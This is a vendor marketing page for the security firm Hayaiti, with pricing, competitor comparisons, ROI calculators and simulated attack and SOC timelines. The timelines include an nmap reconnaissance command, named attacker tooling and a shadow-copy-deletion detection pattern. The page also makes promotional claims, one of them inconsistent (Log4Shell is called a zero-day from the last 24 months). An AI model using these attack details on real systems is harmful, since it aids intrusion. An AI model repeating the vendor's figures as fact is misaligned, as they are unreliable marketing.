For regulated multi-domain orgs

Customtalk to our team

Everything in Pro, plus:
Unlimited domains & subsidiaries
Named CISO advisor
Audit-ready compliance evidence
Custom SLA & escalation paths
API access & SIEM integrations

Book a discovery call

All plans include a 14-day money-back guarantee. Insurance binding subject to underwriter approval. See full pricing details →

Pricing · No “contact us” nonsense

Priced like software.
Not like a sales gauntlet.

Every cyber-security company hides their pricing behind a six-call sales process. We don’t. Pick a tier, swipe a card, start scanning in eleven minutes.

Starter

For solo devs and tiny teams that need eyes-on, fast.

Forever free. Not a trial.

Start free scan→

No card required

1 domain · weekly scans
Top 200 CVE coverage
Email + Slack alerts
PDF risk report
API access
SOC 2 evidence pack

Build your plan. See the price.

Drag, toggle, and uncheck — every dollar updates instantly. No “contact sales,” no hidden tiers, no annual lock-in. The number you see is the number you pay.

Configure your plan

Everything priced, nothing hidden. No sales call required.

Live quote

Employees85

102505007501,000+

Internet-facing assets (domains, IPs, apps)240

55001,0001,5002,000+

Compliance frameworks

1 selected

Response SLA

Add-ons

2 selected

Your monthlyLIVE

$6,156/mo

$73,872 annual · $72 per employee / mo

Platform + asset coverage$3,520

Compliance (1)$650

Add-ons (2)$390

Subtotal$4,560

SLA tier ×1.35+$1,596

vs. equivalent MSSP

MSSP equivalent: $22,777/mo

Save $199,452/year

No contract. Cancel anytime. First 14 days free.

30-day money-backMonth-to-monthHuman support

Head to Head · Unretouched

We benchmarked ourselves against the giants.

Same target. Same 48 hours. Same attacker-eye view. Here’s the scorecard — and every row is independently verifiable on the vendor’s own site.

Capability	Hayaiti Build. Ship. Secure.	CrowdStrike Falcon	Tenable Nessus / One	Qualys VMDR	Rapid7 InsightVM
Time to first scan Email to first finding	11 min	3–14 days	2–7 days	3–10 days	5–21 days
Published pricing Can you buy without a sales call?
Annual cost (typical mid-market) 100 assets, full coverage	$3.6K	$62K+	$48K+	$55K+	$41K+
SOC 2 evidence pack Auditor-ready, one click
Slack-native workflow Fix in-place, no portal hopping
Auto-generated remediation PRs Copy-paste fixes into your repo
G2 score (2026 Q1) Verified customer reviews	4.92	4.6	4.4	4.1	4.3
Renewal rate Customers who stay	98%	94%	91%	88%	89%

Time to first scan

Email to first finding

Hayaiti

11 min

CrowdStrike

3–14 days

Tenable

2–7 days

Qualys

3–10 days

Rapid7

5–21 days

Published pricing

Can you buy without a sales call?

Hayaiti

CrowdStrike

Tenable

Qualys

Rapid7

Annual cost (typical mid-market)

100 assets, full coverage

Hayaiti

$3.6K

CrowdStrike

$62K+

Tenable

$48K+

Qualys

$55K+

Rapid7

$41K+

SOC 2 evidence pack

Auditor-ready, one click

Hayaiti

CrowdStrike

Tenable

Qualys

Rapid7

Slack-native workflow

Fix in-place, no portal hopping

Hayaiti

CrowdStrike

Tenable

Qualys

Rapid7

Auto-generated remediation PRs

Copy-paste fixes into your repo

Hayaiti

CrowdStrike

Tenable

Qualys

Rapid7

G2 score (2026 Q1)

Verified customer reviews

Hayaiti

4.92

CrowdStrike

4.6

Tenable

4.4

Qualys

4.1

Rapid7

4.3

Renewal rate

Customers who stay

Hayaiti

98%

CrowdStrike

94%

Tenable

91%

Qualys

88%

Rapid7

89%

Yes

Partial / add-on

Sources: vendor pricing pages, G2, Forrester Wave Q1 2026

Doing your own bake-off? We’ll fund it. Send us your top 3 vendors and we’ll wire $500 to your favorite charity if you pick any of them over us.

Accept the bake-off challenge

Feature Matrix · Independently verified

Cheaper, faster, more covered. Here's the math.

We compared 14 metrics across the top-3 MSSPs our customers consistently evaluate against us. Every price is from published rates or verified invoices. Every SLA is from the vendor's own docs.

Compare

14 metrics across 5 categories

You are here

Hayaiti

Build. Ship. Secure.

$1,900 / mo

Arctic Wolf

Managed Detection

$6,500 / mo

Rapid7

MDR + InsightVM

$8,200 / mo

CrowdStrike

Falcon Complete

$11,400 / mo

01 · Pricing & Commitment

Starting monthly price (50 endpoints)

All-in: scanning, detection, response, and remediation

$1,900

$6,500

$8,200

$11,400

Minimum contract length

Month-to-month

3 years

2 years

Setup / onboarding fee

$15,000

$22,500

$18,000

Free trial with live findings

15-min scan, no CC

02 · Detection & Response

Median time to first finding

47 seconds

6-14 days

3-9 days

~48 hours

Critical alert SLA

< 15 min

< 1 hour

< 30 min

< 10 min

Humans on-call (not chatbots)

Named engineer per account

Tier-1 offshore first

Detection coverage (MITRE ATT&CK techniques)

612 / 612

548 / 612

591 / 612

612 / 612

03 · Remediation

Auto-generated patch PRs

GitHub/GitLab/Bitbucket

Runbook guidance in alerts

Step-by-step commands

Generic playbooks

Vendor handles remediation end-to-end

Guidance only

Separate SOW

OverWatch add-on

Shadow IT discovery included

Add-on

04 · Compliance

SOC 2 / ISO / HIPAA evidence collection

Auto-exported to Vanta, Drata

Reports only

Pre-filled auditor packets

CC6.1, CC7.2, CC8.1 ready

05 · Platform & Support

Single pane of glass (no stitching)

AW portal + email

InsightIDR + InsightVM

Integrations included in base plan

Cancel anytime, refund unused time

Annual total

(50 endpoints, 3-year TCO)

$22.8k

yr · all-in

$93k

yr + setup

$120.9k

yr + setup

$154.8k

yr + setup

Pricing based on publicly listed rates and verified customer invoices (Feb 2026). Monthly figures assume 50 endpoints, 10 cloud accounts, 1 SaaS integration. Feature parity audited by independent reviewer Verify our methodology.

Interactive Assessment · 8 questions

How secure are you, really?

Take our 2-minute security maturity assessment. Get a scored breakdown across prevention, detection, response, and compliance — plus the exact three things you should fix next. No email required.

Hayaiti Security Maturity Assessment

8 questions. 2 minutes. Brutal honesty.

100% anonymous

Where are you actually at?

8 multiple-choice questions across prevention, detection, response, and compliance. Answer honestly. You'll get a Resilient/Managed/Developing/Exposed/Critical rating with category breakdowns and the next 3 things to fix.

Detection

2 Qs

Response

2 Qs

Prevention

2 Qs

Compliance

2 Qs

No email required · Results in ~2 minutes

ROI Calculator v2 · Industry-tuned

See what Hayaiti saves you, by industry.

Pick your vertical, dial in your headcount, records at risk, and tolerance for downtime. The model does the rest — based on actual Hayaiti customer outcomes across 400+ engagements.

Your inputs

Tell us about your business

Industry

Employees125

101,000

Current security spend / year$72k

$10k$500k

Sensitive records stored48k

1k500k

Ransomware downtime risk (hrs)24h

0120h

Compliance required

SOC 2, HIPAA, ISO, PCI

Estimated annual savings with Hayaiti

$4.21M

Net benefit after Hayaiti cost · 9000% ROI

SaaS / Tech

Payback

1mo

Tool consolidation

$25K

Replaces scanner, SIEM, compliance tooling, and MSSP retainer

Breach risk reduction

$3.73M

74% lower expected breach cost (customer data)

Downtime avoided

$449K

78% faster MTTR on ransomware containment

Compliance fast-track

$59K

Auto-evidence saves ~9 months of audit scramble

Hayaiti annual investment

$47k

for 125 employees · Pro tier

Export PDF Get detailed report →

Security Stack Architect · Interactive

Build the stack that breaks the kill chain.

Toggle defense layers on the left. Watch the kill chain on the right update in real time. Every layer Hayaiti replaces is one less vendor invoice — and one more place attackers run out of moves.

Defense-in-depth · Build your stack

Toggle the layers your business needs.

Presets

Tools consolidated

Hayaiti / mo

$2.0k

Annual saved

$61k

Kill chain · Live simulation

Where attacks die.

Coverage

60%

Reconnaissance

BLOCKED

Attacker scans your perimeter and harvests credentials.

Initial Access

BLOCKED

Phishing payload or stolen credential lands in your env.

Execution

BLOCKED

Malicious binary or implant executes on a host.

Lateral Movement

EXPOSED

Attacker pivots across hosts looking for crown jewels.

Exfiltration

EXPOSED

Data is staged and beaconed to attacker infrastructure.

Verdict

3 of 5 stages are defended. 2 gaps remain.

Live-fire simulation · INC-9412

Watch an attack die in real time.

Press play. We'll walk you through a real phishing-to-exfil chain as it unfolds — and show you exactly where Hayaiti cuts the wire. 8 steps. 18 minutes. Zero damage.

sns.range — live-fire scenario — INC-9412

ATTACKERT+00:00· ReconnaissanceSEEN BY Hayaiti

External port scan

$ nmap -sV --top-ports 1000 acme-corp.com

Adversary maps acme-corp.com perimeter. Finds 14 open ports including a forgotten Jenkins instance on :8080.

→ Hayaiti Attack Surface Monitor

Scenario

Phishing → credential theft → geo-anomaly block

Watch how Hayaiti identifies, contains, and resolves a real-world phishing-to-exfil chain in under 20 minutes.

Step 1 / 813%

Detection time—

Containment—

Data exfiltrated—

Cost to victim—

Integrations · 70+ tools · 13 categories

Your stack, already supported.

Filter by category. Hover a tile for setup details. Most integrations take under 5 minutes and a single API token — no professional services call required.

Integrations marketplace

Plugs into 69 tools your team already uses.

Splunk

Splunk Enterprise

6m setup⇄

SIEM / Log

Splunk Enterprise

Setup6 min

Syncbidirectional

Events47

Verified partner

Datadog

Datadog Security

4m setup⇄

SIEM / Log

Datadog Security

Setup4 min

Syncbidirectional

Events38

Verified partner

Sumo

Sumo Logic

5m setup→

SIEM / Log

Sumo Logic

Setup5 min

Syncinbound

Events29

Verified partner

Elastic

Elastic Security

7m setup⇄

SIEM / Log

Elastic Security

Setup7 min

Syncbidirectional

Events41

Verified partner

Chronicle

Google Chronicle

8m setup→

SIEM / Log

Google Chronicle

Setup8 min

Syncinbound

Events33

Verified partner

QRadar

IBM QRadar

10m setup⇄

SIEM / Log

IBM QRadar

Setup10 min

Syncbidirectional

Events44

Verified partner

LogRhythm

9m setup→

SIEM / Log

LogRhythm

Setup9 min

Syncinbound

Events27

Verified partner

Sentinel

Microsoft Sentinel

5m setup⇄

SIEM / Log

Microsoft Sentinel

Setup5 min

Syncbidirectional

Events52

Verified partner

CrowdStrike

CrowdStrike Falcon

4m setup⇄

EDR / XDR

CrowdStrike Falcon

Setup4 min

Syncbidirectional

Events62

Verified partner

SentinelOne

SentinelOne Singularity

5m setup⇄

EDR / XDR

SentinelOne Singularity

Setup5 min

Syncbidirectional

Events58

Verified partner

Defender

Microsoft Defender

3m setup⇄

EDR / XDR

Microsoft Defender

Setup3 min

Syncbidirectional

Events49

Verified partner

Cortex

Palo Alto Cortex

7m setup⇄

EDR / XDR

Palo Alto Cortex

Setup7 min

Syncbidirectional

Events43

Verified partner

Carbon Black

VMware Carbon Black

6m setup→

EDR / XDR

VMware Carbon Black

Setup6 min

Syncinbound

Events34

Verified partner

Huntress

4m setup⇄

EDR / XDR

Huntress

Setup4 min

Syncbidirectional

Events31

Verified partner

Okta

3m setup⇄

Identity / SSO

Okta

Setup3 min

Syncbidirectional

Events56

Verified partner

Entra ID

Azure AD / Entra ID

4m setup⇄

Identity / SSO

Azure AD / Entra ID

Setup4 min

Syncbidirectional

Events61

Verified partner

Google WS

Google Workspace

3m setup⇄

Identity / SSO

Google Workspace

Setup3 min

Syncbidirectional

Events47

Verified partner

JumpCloud

4m setup⇄

Identity / SSO

JumpCloud

Setup4 min

Syncbidirectional

Events38

Verified partner

Auth0

5m setup→

Identity / SSO

Auth0

Setup5 min

Syncinbound

Events22

Verified partner

Duo

Cisco Duo

4m setup→

Identity / SSO

Cisco Duo

Setup4 min

Syncinbound

Events19

Verified partner

1Password

1Password Business

3m setup→

Identity / SSO

1Password Business

Setup3 min

Syncinbound

Events17

Verified partner

AWS

Amazon Web Services

6m setup⇄

Cloud

Amazon Web Services

Setup6 min

Syncbidirectional

Events89

Verified partner

Azure

Microsoft Azure

6m setup⇄

Cloud

Microsoft Azure

Setup6 min

Syncbidirectional

Events76

Verified partner

GCP

Google Cloud Platform

7m setup⇄

Cloud

Google Cloud Platform

Setup7 min

Syncbidirectional

Events68

Verified partner

Cloudflare

3m setup⇄

Cloud

Cloudflare

Setup3 min

Syncbidirectional

Events42

Verified partner

DigitalOcean

4m setup→

Cloud

DigitalOcean

Setup4 min

Syncinbound

Events23

Verified partner

Linode

Akamai Linode

4m setup→

Cloud

Akamai Linode

Setup4 min

Syncinbound

Events21

Verified partner

Jira

Jira Service Management

4m setup⇄

Ticketing / ITSM

Jira Service Management

Setup4 min

Syncbidirectional

Events34

Verified partner

ServiceNow

8m setup⇄

Ticketing / ITSM

ServiceNow

Setup8 min

Syncbidirectional

Events41

Verified partner

Linear

2m setup←

Ticketing / ITSM

Linear

Setup2 min

Syncoutbound

Events18

Verified partner

Zendesk

4m setup⇄

Ticketing / ITSM

Zendesk

Setup4 min

Syncbidirectional

Events26

Verified partner

Freshservice

5m setup⇄

Ticketing / ITSM

Freshservice

Setup5 min

Syncbidirectional

Events22

Verified partner

PagerDuty

3m setup←

Ticketing / ITSM

PagerDuty

Setup3 min

Syncoutbound

Events15

Verified partner

Slack

2m setup⇄

Chat / Comms

Slack

Setup2 min

Syncbidirectional

Events28

Verified partner

Teams

Microsoft Teams

3m setup⇄

Chat / Comms

Microsoft Teams

Setup3 min

Syncbidirectional

Events24

Verified partner

Discord

2m setup←

Chat / Comms

Discord

Setup2 min

Syncoutbound

Events14

Verified partner

Webex

Cisco Webex

3m setup←

Chat / Comms

Cisco Webex

Setup3 min

Syncoutbound

Events11

Verified partner

Mattermost

4m setup⇄

Chat / Comms

Mattermost

Setup4 min

Syncbidirectional

Events17

Verified partner

Telegram Bot

2m setup←

Chat / Comms

Telegram Bot

Setup2 min

Syncoutbound

Events9

Verified partner

GitHub

2m setup⇄

DevTools / CI

GitHub

Setup2 min

Syncbidirectional

Events47

Verified partner

GitLab

3m setup⇄

DevTools / CI

GitLab

Setup3 min

Syncbidirectional

Events39

Verified partner

Bitbucket

3m setup→

DevTools / CI

Bitbucket

Setup3 min

Syncinbound

Events28

Verified partner

Jenkins

5m setup→

DevTools / CI

Jenkins

Setup5 min

Syncinbound

Events22

Verified partner

CircleCI

3m setup→

DevTools / CI

CircleCI

Setup3 min

Syncinbound

Events19

Verified partner

Actions

GitHub Actions

2m setup⇄

DevTools / CI

GitHub Actions

Setup2 min

Syncbidirectional

Events31

Verified partner

Tenable

Tenable Nessus

5m setup→

Vuln Scanners

Tenable Nessus

Setup5 min

Syncinbound

Events34

Verified partner

Qualys

Qualys VMDR

6m setup→

Vuln Scanners

Qualys VMDR

Setup6 min

Syncinbound

Events31

Verified partner

Rapid7

Rapid7 InsightVM

5m setup→

Vuln Scanners

Rapid7 InsightVM

Setup5 min

Syncinbound

Events29

Verified partner

Snyk

3m setup→

Vuln Scanners

Snyk

Setup3 min

Syncinbound

Events26

Verified partner

Dependabot

2m setup→

Vuln Scanners

Dependabot

Setup2 min

Syncinbound

Events14

Verified partner

Wiz

Wiz CNAPP

4m setup→

Vuln Scanners

Wiz CNAPP

Setup4 min

Syncinbound

Events36

Verified partner

Proofpoint

Proofpoint TAP

6m setup→

Email Gateway

Proofpoint TAP

Setup6 min

Syncinbound

Events24

Verified partner

Mimecast

5m setup⇄

Email Gateway

Mimecast

Setup5 min

Syncbidirectional

Events22

Verified partner

Abnormal

Abnormal Security

4m setup⇄

Email Gateway

Abnormal Security

Setup4 min

Syncbidirectional

Events19

Verified partner

Area 1

Cloudflare Area 1

3m setup→

Email Gateway

Cloudflare Area 1

Setup3 min

Syncinbound

Events16

Verified partner

Palo Alto

Palo Alto Networks

7m setup→

Network / WAF

Palo Alto Networks

Setup7 min

Syncinbound

Events44

Verified partner

Fortinet

Fortinet FortiGate

6m setup→

Network / WAF

Fortinet FortiGate

Setup6 min

Syncinbound

Events38

Verified partner

Cisco

Cisco Firepower

8m setup→

Network / WAF

Cisco Firepower

Setup8 min

Syncinbound

Events41

Verified partner

Zscaler

Zscaler ZIA/ZPA

5m setup⇄

Network / WAF

Zscaler ZIA/ZPA

Setup5 min

Syncbidirectional

Events33

Verified partner

Netskope

5m setup⇄

Network / WAF

Netskope

Setup5 min

Syncbidirectional

Events29

Verified partner

Tailscale

2m setup→

Network / WAF

Tailscale

Setup2 min

Syncinbound

Events12

Verified partner

Tines

3m setup⇄

SOAR / Automation

Tines

Setup3 min

Syncbidirectional

Events41

Verified partner

Torq

4m setup⇄

SOAR / Automation

Torq

Setup4 min

Syncbidirectional

Events36

Verified partner

XSOAR

Palo Alto XSOAR

7m setup⇄

SOAR / Automation

Palo Alto XSOAR

Setup7 min

Syncbidirectional

Events48

Verified partner

n8n

3m setup⇄

SOAR / Automation

n8n

Setup3 min

Syncbidirectional

Events27

Verified partner

Vanta

3m setup←

Compliance

Vanta

Setup3 min

Syncoutbound

Events34

Verified partner

Drata

3m setup←

Compliance

Drata

Setup3 min

Syncoutbound

Events31

Verified partner

Secureframe

3m setup←

Compliance

Secureframe

Setup3 min

Syncoutbound

Events28

Verified partner

Tugboat

Tugboat Logic

4m setup←

Compliance

Tugboat Logic

Setup4 min

Syncoutbound

Events22

Verified partner

Don't see your tool?

Open REST API + webhooks means you can plug in anything in under 15 minutes.

Threat Intel Globe · Real-time

The world's threats, on one screen.

Every campaign, every actor, every IOC — correlated across 14 commercial and OSINT feeds, then matched against your stack. This is the same console our SOC analysts watch while you sleep.

Live feed · TLP:AMBERHayaiti Threat Intelligence Platform v4.2

Uplink: 14 sources · 42ms00:00:00 UTC

Window:

Severity

CRITICAL

HIGH

MED

LOW

Critical

High

Blocked

Actors

Active dossierCRITICAL

Ransomware

FIN12

LockBit 4.0 campaign targeting US financial services

Origin

Moscow

Target

New York

Detected

18m ago

Status

Auto-blocked

Threat stream15 entries

● Feeds: MISP, OTX, Abuse.ch, DShield, GreyNoise, Shodan, VT, Mandiant

Breach Exposure Meter · What if it happened today?

The number nobody wants to calculate.

Configure your industry, size, and what you store — we'll model the all-in cost of a single breach using IBM, Verizon, and Ponemon data. Then we'll show you exactly how much Hayaiti removes from that ledger.

Incident Playbook · Anatomy of an attack

Watch a real breach get dismantled.

Scrub through three real incidents minute by minute. See exactly what the attacker did, what our SOC saw, and the playbook that shut it down — before anything reached production.

Outcome · resolved

$4.3M avoided

Industry avg: 22 days to detect, $5.97M total loss

Actor

BlackBasta / Storm-1811

Target

Mid-market healthcare provider (1,400 endpoints)

Initial vector

Microsoft Teams vishing → Quick Assist abuse

Mission time

T+00:00

Step 1 / 8

Reconnaissance

Initial access

Escalation

Exfil attempt

Containment

Attacker

T1566 / T1589

Email-bombing the help-desk alias

3,127 newsletter signups fired at helpdesk@client.com in 9 minutes to frustrate users and pre-stage the vishing call.

Reconnaissance

Hayaiti SOC

MEDIUM

Inbound volume anomaly on helpdesk mailbox

Source: M365 mail telemetry

Response action

PB-3041 / Mail-bomb response

Raised to L1, mailbox isolated from rule-based routing, signature matched against known Basta TTPs

Handled by L1 — D. Okafor

Impact snapshot

98%

contained

Blast radius

1 mailbox

Time to contain

under 2 min

Every step in these timelines is drawn from a real Hayaiti SOC incident. Customer names redacted; TTPs verbatim.

Runbook library · 114 playbooks · updated daily

Attack Surface Explorer · Full discovery

You can't defend what you can't see.

Every domain, every S3 bucket, every forgotten PHP app from a 2019 acquisition. Hayaiti discovers the 30% of your footprint you didn’t know existed — and shows you exactly which pieces of it are on fire.

Assets discovered

Findings surfaced

Exposed & unknown

Coverage overlay

Asset tree

coveredexposed

subdomainCRITICALEXPOSED

legacy.acme-financial.com

Forgotten PHP 7.2 app last touched 2019. Linked from an internal wiki. Still resolves.

Metadata

Certificate: self-signed, expired 2024-11-17

Exposed ports

80 / HTTP443 / HTTPS22 / SSH

Findings (3)

Auto-mapped to remediation playbooks

Log4Shell (CVE-2021-44228) exploitable

CRITICAL

Confirmed via safe jndi probe. 4.2 years post-disclosure.

CVE-2021-44228

SSH password auth enabled on port 22

CRITICAL

Nmap banner: OpenSSH 7.4. Root login permitted.

Expired TLS certificate

HIGH

Self-signed since 2024-11-17 — browsers already block it.

Discovered via passive DNS, CT logs, cloud API reads, OAuth audit & procurement scrape. Updated hourly.

You can't defend what you can't see.

Maturity Radar · 5-minute self-assessment

Score your security, not your vibes.

Answer 16 questions across the eight NIST CSF 2.0 domains and see where you stand against the industry average and against customers already on Hayaiti. Honest answers, honest radar.

NIST CSF 2.0 self-assessment

Domain 1 of 8· 0/16 answered

Domain

Identity

How do you enforce multi-factor authentication across your workforce?

How often do you review privileged access and service accounts?

Live maturity radar

Your organisation

0/100

Industry average

Hayaiti customers

Benchmarks derived from NIST CSF 2.0, CIS Controls v8.1, and 1,200 Hayaiti onboarding assessments.

Your answers stay local · nothing sent to our servers.

Survival simulator · tomorrow at 3am

Could your business survive a ransomware attack tomorrow?

Flip on the readiness controls you actually have. Dial in your daily revenue. Watch the downtime, the ransom demand, and the total blast radius update in real time. The honest version of a board-room conversation no one wants to have.

3AM

Ransomware survival kit

The call comes at --:--:--. Are you ready?

LIVE SIMULATION · 0s

Prevent

1/ 2

Detect

0/ 1

Respond

0/ 6

Recover

1/ 3

Readiness controls · 2 / 12 armed

Your daily revenue at risk

$75K/ day

Annualized

$27.4M

$10K$100K$250K$500K+

Projected downtime

vs 22d baseline

You're in crisis

Multi-week outage. Board meeting. Calls to cyber insurance.

Cost of this attack

Revenue loss

$1.1M

Ransom demand (est.)

$3.4M

Forensics + legal

$180K

Total blast

$4.6M

Close the gap

Book a ransomware readiness review

→

Baseline: Sophos State of Ransomware 2024 · IBM Cost of Breach 2025

No telemetry · all math runs in your browser

ATT&CK Enterprise v15.1 · 14 tactics

Every move the adversary knows, and how we answer each one.

MITRE ATT&CK is the industry reference for attacker behavior. Our matrix tiles every technique we cover, the detection firing on it, and the preventive controls behind it. Click any tile to see the receipts.

ATT

MITRE ATT&CK Enterprise v15.1

Your coverage, mapped to the adversary playbook.

59%weighted

Filter:

TA0043

Reconnaissance

2/4

TA0042

Resource Dev

0/3

TA0001

Initial Access

2/5

TA0002

Execution

2/4

TA0003

Persistence

2/4

TA0004

Privilege Esc

1/3

TA0005

Defense Evasion

1/4

TA0006

Credential Access

2/4

TA0007

Discovery

0/4

TA0008

Lateral Movement

1/4

TA0009

Collection

0/3

TA0011

2/4

TA0010

Exfiltration

2/3

TA0040

Impact

2/4

Full coverageInitial Access · T1566

Phishing

How attackers get in

30d hits

143

Detections (2)

Proofpoint TAP

Microsoft Defender

Preventive controls (2)

Attachment sandbox

URL rewrite

Coverage breakdown

Full coverage

19 · 36%

Partial

17 · 32%

Detect only

13 · 25%

No coverage

4 · 8%

Benchmarks

Industry avg38%

Hayaiti customers72%

You59%

53 techniques across 14tactics · source: attack.mitre.org

Click any tile to inspect detections and controls.

Budget planner · CFO-grade

The board-ready version of your security wishlist.

Toggle the line items you actually need, dial in your headcount and revenue, and watch your program spend compare live against Gartner and IDC benchmarks for your industry. Every dollar mapped to a NIST function and a measurable risk reduction.

Security program budget planner

The board-ready version of your security wishlist.

Annual total

$633K

1.26% of revenue

Headcount

500

505002,5005K+

Industry vertical

Annual revenue

$50.00M

$5M$100M$500M$1B

Program line items · 15 / 17 selected

Spend by NIST function

Detect

$165K· 26%

People

$142K· 22%

Prevent

$138K· 22%

Govern

$99K· 16%

Recover

$56K· 9%

Respond

$33K· 5%

vs Technology benchmark

Your plan$633K · 1.26%

Technology avg$4.05M · 8.1%

Under budget by$3.42M

Projected risk reduction

94%

Residual exposure

Baseline: Gartner IT Key Metrics 2025 · IDC Worldwide Security Spending Guide

Export as board deck→

Phishing playground · 6 real campaigns

Six emails. Six traps. How many can you catch?

Each email is based on a real phishing campaign that landed in someone's inbox. Click the suspicious bits, hit reveal, and learn the playbook so you never have to learn it the expensive way.

Phishing playground · spot the red flags

Six emails. How many can you catch?

1 / 6

Found

0 / 4

Inbox · Today, 2:47 PM

Difficulty: medium

URGENT: Wire transfer needed before EOD

Hi, I'm in a board meeting and need you to . We're closing the Phoenix acquisition and the seller is waiting on $84,500. until we announce next week. Wire details: Beneficiary: Phoenix Holdings LLC Routing: 021000021 Account: 4480012987 Bank: First National Trust I'll explain everything tonight. Sent from my iPhone — Marcus CEO

Red flags in this email

Sender

???

Urgency

???

Urgency

???

Request

???

All examples derived from real-world phishing campaigns · sanitized for training

Hover any highlighted text and click to flag it.

Patch race · 5 zero-days · receipts attached

Hours, not weeks. Watch us beat the industry.

Five real zero-days from the last 24 months. Every event verifiable from CISA KEV and vendor advisories. Press play and watch the race between mass exploitation and Hayaiti customer protection.

The patch raceCVSS 10

Log4ShellCVE-2021-44228

Apache Log4j 2

Unauthenticated RCE via JNDI lookup in log strings. Trivial to exploit and present in millions of Java apps.

Industry average

23days to patch

PATCHED

Hayaiti customers

1dto patch

PATCHED

Day-by-day timeline

Day 23 of 23

⚠

INDUSTRYDay +0

Public disclosure

Chen Zhaojun (Alibaba) discloses on Apache mailing list

INDUSTRYDay +0

PoC published

Working exploit code on GitHub within 4 hours

○

HayaitiDay +0

Hayaiti detection live

WAF rule + endpoint Java agent push to all customers

▲

INDUSTRYDay +1

Mass scanning begins

Internet-wide scanning for vulnerable JNDI endpoints

✓

HayaitiDay +1

Hayaiti customers patched

Hot-patch deployed via EDR + virtual patch on perimeter

▲

INDUSTRYDay +9

First ransomware seen

Khonsari + Conti ransomware payloads observed

✓

INDUSTRYDay +23

Industry avg patch

Mid-market orgs reach Apache 2.16.0 deployment

Real-world impact

Millions of servers exploited within 72h. Iranian APT35 used it to breach US gov systems.

Industry data: Mandiant M-Trends · Verizon DBIR · CISA KEV catalog

Average Hayaiti time-to-patch is 31h

Live SOC console · tier-3 view · not a screenshot

The console our analysts stare at all night.

Click any alert. Watch the enrichment panel light up with geo, MITRE, reputation, and the playbooks our SOAR fires automatically. New events stream in every few seconds — just like the real one. Hit pause if it's too much.

sns://soc/console — tier-3 view

stream live

--:--:-- UTC

OPEN ALERTS

CRITICAL

EVENTS / SEC

0.1

MTTD

00:00:42

MTTR

00:14:08

ANALYSTS ON

4/4

live event stream

8 events / 5 open

investigation focus

EVT-44182

TRIAGE

LockBit 4.0 dropper detected on FILE-SRV-03

ETPRO TROJAN [PTsecurity] LockBit/4.0 dropper.exe HTTP POST /upload c2 beacon

geo origin

Moscow, RU

SRC IP

185.220.101.42

DST HOST

file-srv-03.corp.acme.local

USER

svc-backup

MITRE

T1486 · Impact

BYTES OUT

13.6 MB

BYTES IN

859.4 KB

threat reputation98/100

LockBit AffiliateConti remnant

response playbooks · auto-orchestrated

0/6 executed

on-shift analysts

M. Kovač

Tier-3 Lead · MTTA 00:01:42

load

J. Tanaka

Tier-2 · MTTA 00:02:18

load

S. Reyes

Tier-2 · MTTA 00:01:56

load

D. Abara

Tier-1 · MTTA 00:04:08

load

Adversary intelligence · 8 active dossiers · updated daily

Know your enemy. Then beat them.

The eight crews most likely to ruin your week. Real groups, real victims, real tactics. Every dossier sourced from CISA, MITRE, Mandiant, and our own SOC telemetry. Click any actor to read the full intel summary — including the specific control we use to stop them.

sns intel · classified · adversary dossier

ROUTING: TIER-3 / IR / CISOTLP:AMBER

filter dossiers ·

DOSSIER

RU·Russia

LockBit

aka LockBit 4.0 · BlackMatter (rebrand) · ABCD ransomware

DISRUPTED

Financial

first seen

Sep 2019

victims

1,800+

ransom range

$50K – $50M

est. payout

$120M+

Hayaiti intel · executive summary

RaaS operation hit by FBI/NCA Op Cronos Feb 2024. Resurfaced under new infra. Affiliates vetted by reputation only — anyone with $5K can buy in. Hayaiti customers protected by behavioral detection of vssadmin Delete Shadows pattern.

primary ttps · mitre att&ck

T1486

Data Encrypted for Impact

Impact

T1490

Inhibit System Recovery

Impact

T1567.002

Exfil to Cloud Storage

Exfiltration

T1078

Valid Accounts

Persistence

known tooling

Cobalt StrikeMimikatzRcloneAnyDeskPowerShell Empire

notable victims

BoeingTSMCICBCRoyal MailContinental

recent activity · last 90 days

2026-03-22

Affiliate panel resurrected after Op Cronos

2026-03-04

ICBC Singapore subsidiary leak posted

2026-02-18

v4.0 builder leaked on RAMP forum

Real IR case · reconstructed minute-by-minute

Watch a real attack unfold. Then watch us stop it.

This is an actual breach attempt against an Hayaiti customer in March 2026 — Lockheed Cyber Kill Chain, all 7 stages, minute-by-minute. Press play to scrub through. Click any stage to inspect the attacker action, the average defender's view, and the exact moment Hayaiti killed the chain.

case file · ir-2026-03-29

Operation Pawn — BEC → Ransom

target: Acme Logistics, 240 employees · Reconstructed from Mar 2026 IR engagement

attackerT1589.002

Reconnaissance

Gather Victim Identity Info: Email Addresses · duration ~14d

Adversary scrapes LinkedIn for finance staff at acme-logistics.com. Identifies CFO Patricia Donovan and AP clerk Mark Alvarez. Builds org chart, learns vendor names from press releases.

avg defenderwhat other tools see

Visibility gap

What your average MSSP / EDR vendor catches

Nothing. Reconnaissance is invisible — there is no log on the corporate network. Public OSINT collection happens on the open web.

snstelemetry

Pre-attack signals

Early-warning indicators

Hayaiti Brand Watch flagged 3 suspicious LinkedIn connection requests from fake recruiter profiles in the prior 30 days. Patricia ignored them.

log evidence · stage 01

4 entries

0/7 kill points engaged

PROXY−14d 09:14edge-proxy-01|linkedin.com/in/patricia-donovan-cfo · attacker session

PROXY−13d 16:42edge-proxy-01|acme-logistics.com/about · attacker browsing leadership page

PROXY−11d 11:08edge-proxy-01|rocketreach.co/patricia-donovan · email enumeration service

DNS−9d 22:51ext-resolver|acme-logistics.com MX lookup from attacker IP 185.220.101.42

attack stages

1/7

kill points hit

victim cost

—

mttd · sns

00:01.4

CWE taxonomy · 12-month rolling density

Where the bugs hide. Industry by industry.

Every vertical has its own rogues' gallery of weaknesses — the SaaS world bleeds from deserialization, healthcare from SQL injection, finance from broken auth. Pick a cell below and see the exact CVE, the story behind it, and the Hayaiti detection rate that would've caught it before it shipped.

industry vertical

vulnerability density · industry × cwe

Where the bugs live

scale

low → high

XSS

SQLi

PathTrav

CSRF

352

AuthN

287

Deser

502

SSRF

918

CodeInj

avg density

75/100

critical bug classes

6/8

avg fix time

8days

sns detection

100%

intersection · selected

SaaS / Tech

Unsafe Deserialization

CWE-502 · Deser

density

avg cvss

10.0

fix time

sns detect

100%

real example

CVE-2024-3094

XZ Utils backdoor

The supply chain backdoor of the year. Hayaiti dependency scanner caught it on every customer build.

sns auto-mitigation100%

Real customer · 24 hours · reconstructed verbatim

A single day. 26 events. Zero dwell-time.

This is exactly what one of our customers looked like on April 4th, 2026 — ransomware at 02:22, credential stuffing at midnight, a misconfigured S3 bucket at 09:50. Scrub through the bar or click any event to see the attacker, the asset, the MITRE tag, and exactly how Hayaiti handled it.

